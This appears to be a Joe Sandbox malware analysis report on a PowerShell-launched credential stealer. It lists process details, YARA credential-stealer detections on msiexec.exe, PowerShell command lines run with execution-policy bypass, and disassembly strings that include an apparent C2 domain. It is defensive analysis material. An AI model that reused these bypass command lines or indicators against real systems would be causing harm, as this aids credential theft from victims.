2024-11-22 15:35:59 UTC	572	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
2024-11-22 15:35:59 UTC	1369	IN	Data Raw: 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 7d 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 Data Ascii: UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:50
2024-11-22 15:35:59 UTC	1369	IN	Data Raw: 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 72 65 6e 74 72 79 2e 63 6f 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 52 61 79 3a 20 27 38 65 36 39 66 65 31 35 32 61 33 36 63 34 30 65 27 2c 63 48 3a 20 27 51 37 53 49 56 4c 64 68 43 49 52 57 56 65 6c 65 57 4d 4f 46 79 33 44 68 4a 48 51 64 4a 7a 44 4b 30 61 47 77 35 78 78 65 58 53 6b 2d 31 37 33 32 32 38 39 37 35 39 2d 31 2e 32 2e 31 2e 31 2d 69 42 36 56 58 46 5f 52 6e 45 59 74 41 45 4e 6d 4b 66 58 31 74 6c 57 55 5a 6d 45 61 37 55 6b 76 67 55 65 32 59 45 64 36 31 33 2e 54 39 4d 42 67 33 Data Ascii: div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "rentry.co",cType: 'managed',cRay: '8e69fe152a36c40e',cH: 'Q7SIVLdhCIRWVeleWMOFy3DhJHQdJzDK0aGw5xxeXSk-1732289759-1.2.1.1-iB6VXF_RnEYtAENmKfX1tlWUZmEa7UkvgUe2YEd613.T9MBg3
2024-11-22 15:35:59 UTC	1369	IN	Data Raw: 34 53 38 42 57 4f 79 5a 67 36 49 58 4b 43 59 30 73 52 56 4b 49 39 5a 52 56 5a 65 62 7a 34 52 79 55 36 4d 66 33 64 61 55 77 6d 58 6a 47 36 4d 48 53 42 63 6f 71 59 64 79 6d 5a 65 4f 61 4f 56 65 5a 55 67 4c 75 6f 30 66 2e 48 61 35 30 31 79 50 4c 73 34 34 73 65 61 7a 5f 36 33 36 6f 5a 36 47 33 78 57 4e 42 5f 39 32 55 6a 77 52 63 5a 72 37 70 36 78 4c 45 61 4b 33 66 36 2e 77 63 4a 61 78 55 63 52 76 72 6c 42 32 58 74 5a 4f 30 33 6e 62 6f 45 43 6e 4a 4e 64 6e 46 71 63 7a 63 68 33 6b 38 50 6b 6e 31 50 77 74 71 73 43 71 4a 35 76 68 71 4d 4b 51 41 47 30 71 5f 4d 72 4c 49 4e 65 33 52 6f 36 66 72 74 4f 61 49 45 61 62 30 39 4d 35 64 5a 2e 33 7a 35 70 33 72 61 72 35 4a 49 43 68 77 6b 54 36 7a 35 2e 30 6a 55 5a 4e 31 45 53 70 46 5f 4b 6c 34 49 43 50 73 31 52 35 6f 6a 55 Data Ascii: 4S8BWOyZg6IXKCY0sRVKI9ZRVZebz4RyU6Mf3daUwmXjG6MHSBcoqYdymZeOaOVeZUgLuo0f.Ha501yPLs44seaz_636oZ6G3xWNB_92UjwRcZr7p6xLEaK3f6.wcJaxUcRvrlB2XtZO03nboECnJNdnFqczch3k8Pkn1PwtqsCqJ5vhqMKQAG0q_MrLINe3Ro6frtOaIEab09M5dZ.3z5p3rar5JIChwkT6z5.0jUZN1ESpF_Kl4ICPs1R5ojU
2024-11-22 15:35:59 UTC	1369	IN	Data Raw: 71 6b 58 47 2e 72 48 79 66 6c 4e 41 52 63 72 47 52 46 74 77 76 61 78 77 66 35 32 31 4e 4c 6a 4f 58 68 4b 31 4b 43 4d 64 7a 32 42 35 4c 5f 42 79 49 6f 6f 6f 31 57 7a 48 68 48 59 36 76 38 74 69 52 37 4e 53 4b 32 65 77 44 67 45 79 70 31 35 5a 67 6b 65 6e 73 6f 59 59 63 68 69 44 38 36 61 43 31 52 77 62 67 6e 36 71 68 57 71 36 4c 58 74 34 2e 6d 76 72 33 70 39 51 79 47 45 33 53 4c 41 36 38 4b 38 58 30 77 42 68 53 56 5f 75 45 4c 50 47 6b 69 77 51 54 35 6b 4b 62 42 68 55 5a 76 46 50 72 72 48 54 42 56 4c 32 39 47 70 61 74 6e 63 70 76 45 4a 77 4a 59 67 70 79 6f 4b 71 7a 5f 4e 49 75 4a 39 55 78 34 34 68 56 74 5f 52 5a 6a 62 57 54 41 49 64 5a 66 65 4e 33 71 71 69 32 74 72 7a 33 61 42 7a 61 6f 45 42 53 2e 7a 52 65 37 4a 30 41 76 74 51 57 6d 79 5f 74 6b 61 65 6c 31 65 Data Ascii: qkXG.rHyflNARcrGRFtwvaxwf521NLjOXhK1KCMdz2B5L_ByIooo1WzHhHY6v8tiR7NSK2ewDgEyp15ZgkensoYYchiD86aC1Rwbgn6qhWq6LXt4.mvr3p9QyGE3SLA68K8X0wBhSV_uELPGkiwQT5kKbBhUZvFPrrHTBVL29GpatncpvEJwJYgpyoKqz_NIuJ9Ux44hVt_RZjbWTAIdZfeN3qqi2trz3aBzaoEBS.zRe7J0AvtQWmy_tkael1e
2024-11-22 15:35:59 UTC	1369	IN	Data Raw: 39 75 69 77 35 35 48 6d 37 4a 73 49 5f 33 7a 62 53 5a 34 2e 55 70 70 75 53 5a 4d 35 68 61 44 50 71 56 43 6c 70 35 6d 38 51 58 4b 33 54 42 67 58 54 72 4e 6e 6b 46 76 75 46 45 37 75 4d 31 48 6a 72 4c 45 72 38 65 51 37 51 48 4c 74 6d 63 66 50 38 51 79 34 5f 49 4c 32 4b 7a 34 59 50 4d 47 48 62 36 72 2e 47 63 6c 43 55 6f 6a 43 76 6f 76 6c 46 71 61 77 52 30 6d 36 58 51 6b 65 53 43 52 6e 59 76 6b 47 54 6f 33 47 62 49 49 78 39 41 69 74 54 37 30 65 41 67 36 75 74 79 6a 49 31 49 6d 48 51 46 4b 4a 51 47 6a 63 72 51 53 74 79 59 39 76 35 5f 69 4c 4c 69 46 7a 59 38 31 41 50 44 62 57 70 42 73 6c 78 4c 6f 36 72 46 76 72 71 59 6d 68 41 61 36 2e 34 70 59 47 33 53 36 41 68 42 37 31 5f 2e 33 78 51 71 4d 5a 37 4e 50 71 64 7a 77 78 54 6f 44 56 72 4b 49 4e 45 63 73 65 33 67 6f Data Ascii: 9uiw55Hm7JsI_3zbSZ4.UppuSZM5haDPqVClp5m8QXK3TBgXTrNnkFvuFE7uM1HjrLEr8eQ7QHLtmcfP8Qy4_IL2Kz4YPMGHb6r.GclCUojCvovlFqawR0m6XQkeSCRnYvkGTo3GbIIx9AitT70eAg6utyjI1ImHQFKJQGjcrQStyY9v5_iLLiFzY81APDbWpBslxLo6rFvrqYmhAa6.4pYG3S6AhB71_.3xQqMZ7NPqdzwxToDVrKINEcse3go
2024-11-22 15:35:59 UTC	1354	IN	Data Raw: 70 4d 65 38 55 48 78 4f 49 71 75 37 44 6a 63 39 7a 71 62 59 45 51 73 45 49 6f 2e 4f 44 45 71 76 44 6b 77 63 6c 67 52 35 66 58 2e 44 34 47 59 6c 65 74 59 75 56 6c 37 76 47 5a 36 33 35 52 35 62 37 6c 69 53 77 5a 72 37 6d 76 41 56 33 31 62 46 57 51 57 51 47 59 4b 65 71 2e 6e 74 59 5a 53 7a 44 6b 46 49 54 51 53 58 4d 61 76 4b 6d 31 77 56 75 65 51 41 59 6a 55 6e 55 51 79 6a 32 6e 75 46 41 56 37 51 65 52 74 34 52 56 2e 73 30 50 4a 57 4f 59 42 76 34 35 64 48 5f 56 64 4a 34 63 44 59 76 4a 35 6c 70 6c 51 74 65 66 61 6b 35 57 62 39 71 58 33 31 6f 62 39 6b 67 4a 4a 31 68 7a 79 4a 51 5f 55 67 44 33 5f 44 43 59 43 74 75 6b 4a 4f 41 76 4a 39 42 44 71 53 72 6e 45 6e 4a 36 47 51 6c 55 5a 6a 70 70 5f 35 4e 66 38 78 72 62 7a 62 6a 52 50 37 42 2e 45 36 75 45 55 32 4f 4c 6d Data Ascii: pMe8UHxOIqu7Djc9zqbYEQsEIo.ODEqvDkwclgR5fX.D4GYletYuVl7vGZ635R5b7liSwZr7mvAV31bFWQWQGYKeq.ntYZSzDkFITQSXMavKm1wVueQAYjUnUQyj2nuFAV7QeRt4RV.s0PJWOYBv45dH_VdJ4cDYvJ5lplQtefak5Wb9qX31ob9kgJJ1hzyJQ_UgD3_DCYCtukJOAvJ9BDqSrnEnJ6GQlUZjpp_5Nf8xrbzbjRP7B.E6uEU2OLm

Target ID:	0
Start time:	10:35:01
Start date:	22/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gkzHdqfg.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:35:01
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:35:26
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe"
Imagebase:	0xfc0000
File size:	6'487'736 bytes
MD5 hash:	11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:35:28
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\more.com
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\more.com
Imagebase:	0x600000
File size:	24'576 bytes
MD5 hash:	03805AE7E8CBC07840108F5C80CF4973
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:35:28
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:35:33
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\msiexec.exe
Imagebase:	0x60000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.2056776253.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.2136313651.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.2136183716.0000000003306000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:35:34
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe"
Imagebase:	0xfc0000
File size:	6'487'736 bytes
MD5 hash:	11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:35:43
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe"
Imagebase:	0xfc0000
File size:	6'487'736 bytes
MD5 hash:	11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:35:58
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\ZZJTWAOIXLEHV8HOYD0ZL8WGES83EVQ.ps1"
Imagebase:	0x480000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:35:58
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	73.8%
Total number of Nodes:	328
Total number of Limit Nodes:	29

Executed Functions

Function 02F190B0 Relevance: 26.9, APIs: 11, Strings: 4, Instructions: 689
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(02F24678,00000000,00000001,02F24668,00000000), ref: 02F1919C
SysAllocString.OLEAUT32(21D727D6), ref: 02F1922F
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02F19275
SysAllocString.OLEAUT32(1F4F1943), ref: 02F192F6
SysAllocString.OLEAUT32(1F4F1943), ref: 02F193B6
VariantInit.OLEAUT32(?), ref: 02F19425

Strings

WC, xrefs: 02F19336
\, xrefs: 02F19157
C, xrefs: 02F1914C
ZQ, xrefs: 02F19326

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: C$WC$ZQ$\
API String ID: 65563702-2112902398
Opcode ID: c7a6605495cc62263c1be86c4c477911f02f7643a40e92e6371579b4c353b459
Instruction ID: 92f349613e5f8e99ad3b0b7459f5607f726dcbf1a17ad7506ec87c5911f992bd
Opcode Fuzzy Hash: c7a6605495cc62263c1be86c4c477911f02f7643a40e92e6371579b4c353b459
Instruction Fuzzy Hash: FA224272A083409BE724CF24CC51B5BBBE6EF85354F48892CE6959B380D7B8D905CBD2

Function 02F02C80 Relevance: 26.8, Strings: 21, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 02F030AE
+, xrefs: 02F02D2A
+, xrefs: 02F0340A
B, xrefs: 02F02EA2
+, xrefs: 02F0314F
(, xrefs: 02F03157
(, xrefs: 02F03412
%, xrefs: 02F033FA
!@, xrefs: 02F02CB6
%, xrefs: 02F0313F
(, xrefs: 02F02D32
z, xrefs: 02F02F30
,, xrefs: 02F03225
|, xrefs: 02F02F3A
*, xrefs: 02F03147
*, xrefs: 02F03402
e, xrefs: 02F030B8
w, xrefs: 02F032C8
%, xrefs: 02F02D1A
*, xrefs: 02F02D22
a, xrefs: 02F030BD

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID:
String ID: !@$%$%$%$($($($*$*$*$+$+$+$,$B$a$d$e$w$z$|
API String ID: 0-1652094770
Opcode ID: 9ce8bd939a07dce727b43c6776cee39d5d3f075ee936bbf06f5104fe2b69ed0f
Instruction ID: b5490374a04a21ac46d05e49a8a9f03c5c1e8f09069fa5dbed7e032d7480d684
Opcode Fuzzy Hash: 9ce8bd939a07dce727b43c6776cee39d5d3f075ee936bbf06f5104fe2b69ed0f
Instruction Fuzzy Hash: B532AD71A0C3808FD3259B28C48436EFBE1ABC6354F18896DEAD9873C2D7798845DB53

Function 02EEDDB7 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 02EEDDCC

Strings

HI, xrefs: 02EEE1BE
/AC, xrefs: 02EEE1E0
", xrefs: 02EEDDE1
s{, xrefs: 02EEE09C
adj|, xrefs: 02EEDE77
ohgd, xrefs: 02EEDE82
F?>1, xrefs: 02EEE12B
wnm/, xrefs: 02EEDE8D
candidatersz.cyou, xrefs: 02EEE233
\]^W, xrefs: 02EEDEA3

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: Uninitialize
String ID: "$/AC$F?>1$HI$\]^W$adj|$candidatersz.cyou$ohgd$s{$wnm/
API String ID: 3861434553-1903161426
Opcode ID: 1402592709e45d6602c12df53ba0c8829864fb6b6640d9b7c605b0cf964d32b8
Instruction ID: 9df06a78fcb0e97b03330b4c00cc07603709e52cdab6bb4e7430f2cae9528814
Opcode Fuzzy Hash: 1402592709e45d6602c12df53ba0c8829864fb6b6640d9b7c605b0cf964d32b8
Instruction Fuzzy Hash: 1FB1BCB554C3C28AD7358F2584907EBBBE1AFE2318F18995CE1D94B292D775400ACB93

Function 02EF938B Relevance: 16.8, APIs: 1, Strings: 8, Instructions: 1047COMMON

Download Yara Rule

Strings

N, xrefs: 02EF9ABE
!4, xrefs: 02EF9AB4
--%(, xrefs: 02EF9AA9
S./,, xrefs: 02EF9D04
-)#i, xrefs: 02EF9CEE
!',$, xrefs: 02EF9CF9
%*+(, xrefs: 02EF9736
84, xrefs: 02EF9D0F

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID:
String ID: !',$$!4$%*+($-)#i$--%($84$N$S./,
API String ID: 0-3674210783
Opcode ID: 20a4eb96581f5177e87b502244c5e54f282683c1cdbcd72252862f312a93d630
Instruction ID: 4d3498ccd49dac48b3cdcd1a8ae8de9199d51ce520c188fb87f79b3c55f575ad
Opcode Fuzzy Hash: 20a4eb96581f5177e87b502244c5e54f282683c1cdbcd72252862f312a93d630
Instruction Fuzzy Hash: DD6244B1948344CBD734DF24D8917EBB7E1EF8A304F05992CEACA8B241E7348915CB92

Function 02F047A0 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 499
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

j;h9, xrefs: 02F04D0F
}E, xrefs: 02F04A5B
|r, xrefs: 02F04D73
PQ, xrefs: 02F04C84
8k:i, xrefs: 02F04994
qr, xrefs: 02F04D63
us, xrefs: 02F04C3C

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID:
String ID: 8k:i$PQ$j;h9$qr$|r$}E$us
API String ID: 0-3571316266
Opcode ID: af9d3521b6350978582c7e32871eec0fc4734981334627fe6cccc52a3d3b22ec
Instruction ID: f9f52eb5308b4e5b7aa51148be332dcfaae7a79b8be276d183e903940202bfe5
Opcode Fuzzy Hash: af9d3521b6350978582c7e32871eec0fc4734981334627fe6cccc52a3d3b22ec
Instruction Fuzzy Hash: 9AF1DAB16083819FD314CF65E89175BBBE6EF82394F04892CE6858B391E778C909CB56

Function 02F04E40 Relevance: 10.3, Strings: 8, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8;, xrefs: 02F04EC5
V'D!, xrefs: 02F04E89
[3F=, xrefs: 02F04EB1
x+X5, xrefs: 02F04EA1
@/J), xrefs: 02F04E99
E7X1, xrefs: 02F04EA9
S?C9, xrefs: 02F04EB9
K#P-, xrefs: 02F04E91

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID:
String ID: 8;$@/J)$E7X1$K#P-$S?C9$V'D!$[3F=$x+X5
API String ID: 0-4009494436
Opcode ID: 65f1ceb40c5b6e53f0c3f0fbf15efa764e5d590bd97f35add3c5545720b5c102
Instruction ID: 2210462dbe6d1bdd177537aa8fa46a9994b3202ba875d66fe548562f5a18f286
Opcode Fuzzy Hash: 65f1ceb40c5b6e53f0c3f0fbf15efa764e5d590bd97f35add3c5545720b5c102
Instruction Fuzzy Hash: 3D91FE75A483449FD320CF14D880B5FBBE5FB86784F01892DF6899B281D77599098B92

Function 02EEB330 Relevance: 9.3, Strings: 7, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

kG, xrefs: 02EEB4BF
]q, xrefs: 02EEB4D3
wt, xrefs: 02EEB4C9
-{1y, xrefs: 02EEB5E1
&s?q, xrefs: 02EEB5F5
5w?u, xrefs: 02EEB5EB
:onm, xrefs: 02EEB5FF

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID:
String ID: &s?q$-{1y$5w?u$:onm$]q$kG$wt
API String ID: 0-2020362014
Opcode ID: ad2bfd452f3291ab85d817999226447b62537e68bb00fca7aed52b43599a6c10
Instruction ID: 7c0d520ebc44dd1e9503f7c96c6c2b34f2cdd9c8308cf47cf449754d59a28843
Opcode Fuzzy Hash: ad2bfd452f3291ab85d817999226447b62537e68bb00fca7aed52b43599a6c10
